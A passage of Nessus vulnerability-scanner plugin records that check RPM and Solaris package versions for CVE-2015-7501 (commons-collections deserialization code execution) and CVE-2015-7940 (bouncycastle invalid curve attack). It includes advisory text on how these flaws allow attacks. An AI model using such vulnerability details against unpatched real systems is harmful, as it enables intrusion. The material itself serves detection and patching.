'content/dist/rhel/power-le/7/7Server/ppc64le/rhscl/1/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/rhscl/1/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/rhscl/1/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/rhscl/1/os',\n 'content/dist/rhel/power/7/7Server/ppc64/rhscl/1/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/rhscl/1/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/rhscl/1/os',\n 'content/dist/rhel/server/7/7Server/x86_64/rhscl/1/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/rhscl/1/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/rhscl/1/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/rhscl/1/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/rhscl/1/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/rhscl/1/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/rhscl/1/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'rh-maven35-apache-commons-collections4-4.0-7.3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'rh-maven35-apache-commons-collections4-javadoc-4.0-7.3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if 
(!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'rh-maven35-apache-commons-collections4 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:44:57", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. 
Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific deserialization vulnerability is to remove the vulnerable class files (InvokerTransformer, InstantiateFactory, and InstantiateTransformer) in all commons-collections jar files. Any manual changes should be tested to avoid unforeseen complications.\n\nAll running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : jakarta-commons-collections on SL6.x (noarch) (20151130)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151130_JAKARTA_COMMONS_COLLECTIONS_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87121", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87121);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n\n script_name(english:\"Scientific Linux Security Update : jakarta-commons-collections on SL6.x (noarch) (20151130)\");\n script_summary(english:\"Checks rpm output for 
the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-\ncollections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific\ndeserialization vulnerability is to remove the vulnerable class files\n(InvokerTransformer, InstantiateFactory, and InstantiateTransformer)\nin all commons-collections jar files. 
Any manual changes should be\ntested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1511&L=scientific-linux-errata&F=&S=&P=17116\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1bc1816\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:05", "description": "bouncycastle was updated to version 1.53 to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-7940: Invalid curve attack (bsc#951727).", "cvss3": {}, "published": "2015-11-05T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bouncycastle (openSUSE-2015-705)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bouncycastle", "p-cpe:/a:novell:opensuse:bouncycastle-javadoc", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2", 
"cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2015-705.NASL", "href": "https://www.tenable.com/plugins/nessus/86740", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-705.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86740);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-7940\");\n\n script_name(english:\"openSUSE Security Update : bouncycastle (openSUSE-2015-705)\");\n script_summary(english:\"Check for the openSUSE-2015-705 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bouncycastle was updated to version 1.53 to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-7940: Invalid curve attack (bsc#951727).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=951727\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bouncycastle packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bouncycastle-1.53-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bouncycastle-javadoc-1.53-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bouncycastle-1.53-13.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bouncycastle-javadoc-1.53-13.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bouncycastle-1.53-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bouncycastle-javadoc-1.53-16.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bouncycastle / bouncycastle-javadoc\");\n}\n", "cvss": {"score": 0.0, 
"vector": "NONE"}}, {"lastseen": "2023-12-08T14:37:06", "description": "Security fix for CVE-2015-7940\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 22 : bouncycastle-1.50-8.fc22 (2015-7d95466eda)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bouncycastle", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-7D95466EDA.NASL", "href": "https://www.tenable.com/plugins/nessus/89298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-7d95466eda.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89298);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n script_xref(name:\"FEDORA\", value:\"2015-7d95466eda\");\n\n script_name(english:\"Fedora 22 : bouncycastle-1.50-8.fc22 (2015-7d95466eda)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7940\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1276272\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-January/174915.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?98f40c66\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bouncycastle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"bouncycastle-1.50-8.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bouncycastle\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:36:53", "description": "Indexing and Search Service 1u5-29.15600: core patch.\nDate this patch was last updated by Sun : Jan/07/17", "cvss3": {}, "published": "2018-03-12T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 142824-29", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:142824", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_142824-29.NASL", "href": "https://www.tenable.com/plugins/nessus/107538", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107538);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7940\");\n\n script_name(english:\"Solaris 10 (sparc) : 142824-29\");\n script_summary(english:\"Check for patch 142824-29\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is 
missing Sun Security Patch number 142824-29\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Indexing and Search Service 1u5-29.15600: core patch.\nDate this patch was last updated by Sun : Jan/07/17\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/142824-29\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 142824-29 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7940\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142824\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"142824-29\", obsoleted_by:\"\", package:\"SUNWjiss\", version:\"1.0,REV=2009.09.09\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjiss\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:50:04", "description": "According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.1.x prior to 3.1.6.7959.\nIt is, therefore, affected by a remote code execution vulnerability in the 
JMXInvokerServlet interface due to improper validation of Java objects before deserialization. An authenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2015-7501)", "cvss3": {}, "published": "2017-01-25T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.1.x < 3.1.6.7959 Java Object Deserialization RCE (January 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_3_1_6_7959.NASL", "href": "https://www.tenable.com/plugins/nessus/96768", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96768);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_bugtraq_id(78215);\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.1.x < 3.1.6.7959 Java Object Deserialization RCE (January 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.1.x prior to 3.1.6.7959.\nIt is, therefore, affected by a remote code execution vulnerability in\nthe JMXInvokerServlet interface due to improper validation of Java\nobjects before deserialization. An authenticated, remote attacker can\nexploit this to execute arbitrary code. 
(CVE-2015-7501)\");\n # https://dev.mysql.com/doc/relnotes/mysql-monitor/3.1/en/news-3-1-6.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0752b1b7\");\n # http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a1c38e52\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.1.6.7959 or later as\nreferenced in the January 2017 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/25\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
